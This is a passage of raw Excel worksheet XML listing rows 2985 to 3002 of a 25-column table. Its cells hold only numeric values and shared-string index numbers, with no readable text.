      <c r="B2985" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2985" s="12" t="s">
        <v>31504</v>
      </c>
      <c r="F2985" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2985" s="12" t="s">
        <v>20308</v>
      </c>
      <c r="H2985" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2985" s="12" t="s">
        <v>5208</v>
      </c>
      <c r="J2985" s="12" t="s">
        <v>10712</v>
      </c>
      <c r="K2985" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2985" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2985" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2985" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2985" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2985" s="12" t="s">
        <v>20309</v>
      </c>
      <c r="Q2985" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2985" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2985" s="12" t="s">
        <v>20310</v>
      </c>
      <c r="T2985" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2985" s="12" t="s">
        <v>20311</v>
      </c>
      <c r="V2985" s="12" t="s">
        <v>10712</v>
      </c>
      <c r="W2985" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2985" s="12">
        <v>1</v>
      </c>
      <c r="Y2985" s="12" t="s">
        <v>20312</v>
      </c>
    </row>
    <row r="2986" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2986" s="12">
        <v>14048</v>
      </c>
      <c r="B2986" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C2986" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D2986" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2986" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F2986" s="12" t="s">
        <v>30042</v>
      </c>
      <c r="G2986" s="12" t="s">
        <v>20319</v>
      </c>
      <c r="H2986" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2986" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2986" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2986" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2986" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2986" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2986" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2986" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2986" s="12" t="s">
        <v>20320</v>
      </c>
      <c r="Q2986" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2986" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2986" s="12" t="s">
        <v>20321</v>
      </c>
      <c r="T2986" s="12" t="s">
        <v>20322</v>
      </c>
      <c r="U2986" s="12" t="s">
        <v>20323</v>
      </c>
      <c r="V2986" s="12" t="s">
        <v>6806</v>
      </c>
      <c r="W2986" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2986" s="12">
        <v>2</v>
      </c>
      <c r="Y2986" s="12" t="s">
        <v>20324</v>
      </c>
    </row>
    <row r="2987" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2987" s="12">
        <v>14053</v>
      </c>
      <c r="B2987" s="12" t="s">
        <v>30518</v>
      </c>
      <c r="C2987" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D2987" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2987" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F2987" s="12" t="s">
        <v>30533</v>
      </c>
      <c r="G2987" s="12" t="s">
        <v>20325</v>
      </c>
      <c r="H2987" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2987" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2987" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K2987" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2987" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M2987" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N2987" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O2987" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2987" s="12" t="s">
        <v>20326</v>
      </c>
      <c r="Q2987" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2987" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S2987" s="12" t="s">
        <v>20327</v>
      </c>
      <c r="T2987" s="12" t="s">
        <v>20328</v>
      </c>
      <c r="U2987" s="12" t="s">
        <v>20329</v>
      </c>
      <c r="V2987" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W2987" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2987" s="12">
        <v>5</v>
      </c>
      <c r="Y2987" s="12" t="s">
        <v>20330</v>
      </c>
    </row>
    <row r="2988" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2988" s="12">
        <v>14057</v>
      </c>
      <c r="B2988" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C2988" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D2988" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2988" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2988" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G2988" s="12" t="s">
        <v>20331</v>
      </c>
      <c r="H2988" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2988" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2988" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K2988" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2988" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2988" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2988" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2988" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2988" s="12" t="s">
        <v>19986</v>
      </c>
      <c r="Q2988" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2988" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2988" s="12" t="s">
        <v>20332</v>
      </c>
      <c r="T2988" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2988" s="12" t="s">
        <v>20333</v>
      </c>
      <c r="V2988" s="12" t="s">
        <v>10538</v>
      </c>
      <c r="W2988" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2988" s="12">
        <v>1</v>
      </c>
      <c r="Y2988" s="12" t="s">
        <v>20334</v>
      </c>
    </row>
    <row r="2989" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2989" s="12">
        <v>14058</v>
      </c>
      <c r="B2989" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C2989" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D2989" s="12" t="s">
        <v>30721</v>
      </c>
      <c r="E2989" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F2989" s="12" t="s">
        <v>30731</v>
      </c>
      <c r="G2989" s="12" t="s">
        <v>20335</v>
      </c>
      <c r="H2989" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2989" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2989" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2989" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2989" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2989" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2989" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2989" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2989" s="12" t="s">
        <v>20263</v>
      </c>
      <c r="Q2989" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2989" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2989" s="12" t="s">
        <v>20336</v>
      </c>
      <c r="T2989" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2989" s="12" t="s">
        <v>20337</v>
      </c>
      <c r="V2989" s="12" t="s">
        <v>3800</v>
      </c>
      <c r="W2989" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2989" s="12">
        <v>1</v>
      </c>
      <c r="Y2989" s="12" t="s">
        <v>20338</v>
      </c>
    </row>
    <row r="2990" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2990" s="12">
        <v>14059</v>
      </c>
      <c r="B2990" s="12" t="s">
        <v>30405</v>
      </c>
      <c r="C2990" s="12" t="s">
        <v>30406</v>
      </c>
      <c r="D2990" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2990" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2990" s="12" t="s">
        <v>30381</v>
      </c>
      <c r="G2990" s="12" t="s">
        <v>20339</v>
      </c>
      <c r="H2990" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2990" s="12" t="s">
        <v>14196</v>
      </c>
      <c r="J2990" s="12" t="s">
        <v>15582</v>
      </c>
      <c r="K2990" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2990" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2990" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2990" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2990" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2990" s="12" t="s">
        <v>20263</v>
      </c>
      <c r="Q2990" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2990" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2990" s="12" t="s">
        <v>20340</v>
      </c>
      <c r="T2990" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2990" s="12" t="s">
        <v>20341</v>
      </c>
      <c r="V2990" s="12" t="s">
        <v>15585</v>
      </c>
      <c r="W2990" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2990" s="12">
        <v>1</v>
      </c>
      <c r="Y2990" s="12" t="s">
        <v>20342</v>
      </c>
    </row>
    <row r="2991" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2991" s="12">
        <v>14061</v>
      </c>
      <c r="B2991" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C2991" s="12" t="s">
        <v>30407</v>
      </c>
      <c r="D2991" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2991" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F2991" s="12" t="s">
        <v>30381</v>
      </c>
      <c r="G2991" s="12" t="s">
        <v>20344</v>
      </c>
      <c r="H2991" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2991" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2991" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K2991" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2991" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2991" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2991" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2991" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2991" s="12" t="s">
        <v>20343</v>
      </c>
      <c r="Q2991" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2991" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2991" s="12" t="s">
        <v>20345</v>
      </c>
      <c r="T2991" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2991" s="12" t="s">
        <v>20346</v>
      </c>
      <c r="V2991" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W2991" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2991" s="12">
        <v>2</v>
      </c>
      <c r="Y2991" s="12" t="s">
        <v>20347</v>
      </c>
    </row>
    <row r="2992" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2992" s="12">
        <v>14062</v>
      </c>
      <c r="B2992" s="12" t="s">
        <v>30323</v>
      </c>
      <c r="D2992" s="12" t="s">
        <v>30326</v>
      </c>
      <c r="E2992" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F2992" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2992" s="12" t="s">
        <v>20348</v>
      </c>
      <c r="H2992" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2992" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J2992" s="12" t="s">
        <v>683</v>
      </c>
      <c r="K2992" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2992" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2992" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2992" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2992" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2992" s="12" t="s">
        <v>19986</v>
      </c>
      <c r="Q2992" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2992" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2992" s="12" t="s">
        <v>20349</v>
      </c>
      <c r="T2992" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2992" s="12" t="s">
        <v>20350</v>
      </c>
      <c r="V2992" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W2992" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2992" s="12">
        <v>1</v>
      </c>
      <c r="Y2992" s="12" t="s">
        <v>20351</v>
      </c>
    </row>
    <row r="2993" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2993" s="12">
        <v>14080</v>
      </c>
      <c r="B2993" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2993" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2993" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F2993" s="12" t="s">
        <v>30050</v>
      </c>
      <c r="G2993" s="12" t="s">
        <v>20352</v>
      </c>
      <c r="H2993" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2993" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2993" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2993" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2993" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2993" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2993" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2993" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2993" s="12" t="s">
        <v>20353</v>
      </c>
      <c r="Q2993" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2993" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2993" s="12" t="s">
        <v>20354</v>
      </c>
      <c r="T2993" s="12" t="s">
        <v>18292</v>
      </c>
      <c r="U2993" s="12" t="s">
        <v>20355</v>
      </c>
      <c r="V2993" s="12" t="s">
        <v>3800</v>
      </c>
      <c r="W2993" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2993" s="12">
        <v>1</v>
      </c>
      <c r="Y2993" s="12" t="s">
        <v>20356</v>
      </c>
    </row>
    <row r="2994" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2994" s="12">
        <v>14081</v>
      </c>
      <c r="B2994" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2994" s="12" t="s">
        <v>30721</v>
      </c>
      <c r="E2994" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F2994" s="12" t="s">
        <v>30732</v>
      </c>
      <c r="G2994" s="12" t="s">
        <v>20357</v>
      </c>
      <c r="H2994" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2994" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2994" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K2994" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2994" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2994" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2994" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2994" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2994" s="12" t="s">
        <v>20353</v>
      </c>
      <c r="Q2994" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2994" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2994" s="12" t="s">
        <v>20358</v>
      </c>
      <c r="T2994" s="12" t="s">
        <v>20359</v>
      </c>
      <c r="U2994" s="12" t="s">
        <v>20360</v>
      </c>
      <c r="V2994" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W2994" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2994" s="12">
        <v>10</v>
      </c>
      <c r="Y2994" s="12" t="s">
        <v>20361</v>
      </c>
    </row>
    <row r="2995" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2995" s="12">
        <v>14086</v>
      </c>
      <c r="B2995" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2995" s="12" t="s">
        <v>31083</v>
      </c>
      <c r="E2995" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F2995" s="12" t="s">
        <v>31088</v>
      </c>
      <c r="G2995" s="12" t="s">
        <v>20362</v>
      </c>
      <c r="H2995" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2995" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2995" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K2995" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2995" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2995" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2995" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2995" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2995" s="12" t="s">
        <v>20343</v>
      </c>
      <c r="Q2995" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2995" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2995" s="12" t="s">
        <v>20363</v>
      </c>
      <c r="T2995" s="12" t="s">
        <v>20364</v>
      </c>
      <c r="U2995" s="12" t="s">
        <v>20365</v>
      </c>
      <c r="V2995" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W2995" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2995" s="12">
        <v>14</v>
      </c>
      <c r="Y2995" s="12" t="s">
        <v>20366</v>
      </c>
    </row>
    <row r="2996" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2996" s="12">
        <v>14090</v>
      </c>
      <c r="B2996" s="12" t="s">
        <v>30733</v>
      </c>
      <c r="D2996" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2996" s="12" t="s">
        <v>30690</v>
      </c>
      <c r="G2996" s="12" t="s">
        <v>20367</v>
      </c>
      <c r="H2996" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2996" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J2996" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2996" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2996" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2996" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2996" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2996" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2996" s="12" t="s">
        <v>20353</v>
      </c>
      <c r="Q2996" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2996" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2996" s="12" t="s">
        <v>20368</v>
      </c>
      <c r="T2996" s="12" t="s">
        <v>7751</v>
      </c>
      <c r="U2996" s="12" t="s">
        <v>20369</v>
      </c>
      <c r="V2996" s="12" t="s">
        <v>3800</v>
      </c>
      <c r="W2996" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2996" s="12">
        <v>11</v>
      </c>
      <c r="Y2996" s="12" t="s">
        <v>20370</v>
      </c>
    </row>
    <row r="2997" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2997" s="12">
        <v>14103</v>
      </c>
      <c r="B2997" s="12" t="s">
        <v>31324</v>
      </c>
      <c r="D2997" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2997" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2997" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2997" s="12" t="s">
        <v>20371</v>
      </c>
      <c r="H2997" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2997" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2997" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K2997" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2997" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2997" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2997" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2997" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2997" s="12" t="s">
        <v>20353</v>
      </c>
      <c r="Q2997" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2997" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2997" s="12" t="s">
        <v>20372</v>
      </c>
      <c r="T2997" s="12" t="s">
        <v>15304</v>
      </c>
      <c r="U2997" s="12" t="s">
        <v>20373</v>
      </c>
      <c r="V2997" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W2997" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2997" s="12">
        <v>17</v>
      </c>
      <c r="Y2997" s="12" t="s">
        <v>20374</v>
      </c>
    </row>
    <row r="2998" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2998" s="12">
        <v>14107</v>
      </c>
      <c r="B2998" s="12" t="s">
        <v>28354</v>
      </c>
      <c r="D2998" s="12" t="s">
        <v>30491</v>
      </c>
      <c r="F2998" s="12" t="s">
        <v>30466</v>
      </c>
      <c r="G2998" s="12" t="s">
        <v>20375</v>
      </c>
      <c r="H2998" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2998" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2998" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K2998" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2998" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2998" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2998" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2998" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2998" s="12" t="s">
        <v>20376</v>
      </c>
      <c r="Q2998" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2998" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2998" s="12" t="s">
        <v>20377</v>
      </c>
      <c r="T2998" s="12" t="s">
        <v>20378</v>
      </c>
      <c r="U2998" s="12" t="s">
        <v>20379</v>
      </c>
      <c r="V2998" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W2998" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2998" s="12">
        <v>19</v>
      </c>
      <c r="Y2998" s="12" t="s">
        <v>20380</v>
      </c>
    </row>
    <row r="2999" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2999" s="12">
        <v>14114</v>
      </c>
      <c r="B2999" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2999" s="12" t="s">
        <v>30172</v>
      </c>
      <c r="E2999" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2999" s="12" t="s">
        <v>30155</v>
      </c>
      <c r="G2999" s="12" t="s">
        <v>20381</v>
      </c>
      <c r="H2999" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2999" s="12" t="s">
        <v>5208</v>
      </c>
      <c r="J2999" s="12" t="s">
        <v>8652</v>
      </c>
      <c r="K2999" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2999" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2999" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2999" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2999" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2999" s="12" t="s">
        <v>20343</v>
      </c>
      <c r="Q2999" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R2999" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2999" s="12" t="s">
        <v>20382</v>
      </c>
      <c r="T2999" s="12" t="s">
        <v>20383</v>
      </c>
      <c r="U2999" s="12" t="s">
        <v>20384</v>
      </c>
      <c r="V2999" s="12" t="s">
        <v>8653</v>
      </c>
      <c r="W2999" s="12">
        <v>14966</v>
      </c>
      <c r="X2999" s="12">
        <v>15</v>
      </c>
      <c r="Y2999" s="12" t="s">
        <v>20385</v>
      </c>
    </row>
    <row r="3000" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3000" s="12">
        <v>14129</v>
      </c>
      <c r="B3000" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C3000" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D3000" s="12" t="s">
        <v>30051</v>
      </c>
      <c r="E3000" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3000" s="12" t="s">
        <v>30052</v>
      </c>
      <c r="G3000" s="12" t="s">
        <v>20386</v>
      </c>
      <c r="H3000" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3000" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3000" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K3000" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3000" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3000" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3000" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3000" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3000" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="Q3000" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R3000" s="12" t="s">
        <v>11549</v>
      </c>
      <c r="S3000" s="12" t="s">
        <v>20387</v>
      </c>
      <c r="T3000" s="12" t="s">
        <v>18480</v>
      </c>
      <c r="U3000" s="12" t="s">
        <v>20388</v>
      </c>
      <c r="V3000" s="12" t="s">
        <v>4540</v>
      </c>
      <c r="W3000" s="12">
        <v>14317</v>
      </c>
      <c r="X3000" s="12">
        <v>30</v>
      </c>
      <c r="Y3000" s="12" t="s">
        <v>20389</v>
      </c>
    </row>
    <row r="3001" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3001" s="12">
        <v>14133</v>
      </c>
      <c r="B3001" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D3001" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3001" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3001" s="12" t="s">
        <v>20390</v>
      </c>
      <c r="H3001" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3001" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J3001" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K3001" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3001" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3001" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3001" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3001" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3001" s="12" t="s">
        <v>20353</v>
      </c>
      <c r="Q3001" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R3001" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3001" s="12" t="s">
        <v>20391</v>
      </c>
      <c r="T3001" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U3001" s="12" t="s">
        <v>20392</v>
      </c>
      <c r="V3001" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W3001" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3001" s="12">
        <v>1</v>
      </c>
      <c r="Y3001" s="12" t="s">
        <v>20393</v>
      </c>
    </row>
    <row r="3002" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3002" s="12">
        <v>14134</v>
      </c>
      <c r="B3002" s="12" t="s">
        <v>31002</v>
      </c>
      <c r="D3002" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3002" s="12" t="s">
        <v>31449</v>
      </c>
      <c r="F3002" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3002" s="12" t="s">
        <v>20394</v>
      </c>
      <c r="H3002" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3002" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3002" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K3002" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3002" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3002" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3002" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3002" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3002" s="12" t="s">
        <v>20353</v>
      </c>
      <c r="Q3002" s="12" t="s">
        <v>18478</v>
      </c>
      <c r="R3002" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3002" s="12" t="s">
        <v>20395</v>
      </c>
      <c r="T3002" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U3002" s="12" t="s">
        <v>20396</v>
      </c>
      <c r="V3002" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W3002" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3002" s="12">
        <v>1</v>
      </c>
      <c r="Y3002" s="12" t="s">
        <v>20397</v>
      </c>
    </row>
    <row r="3003" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3003" s="12">
        <v>14135</v>
      </c>
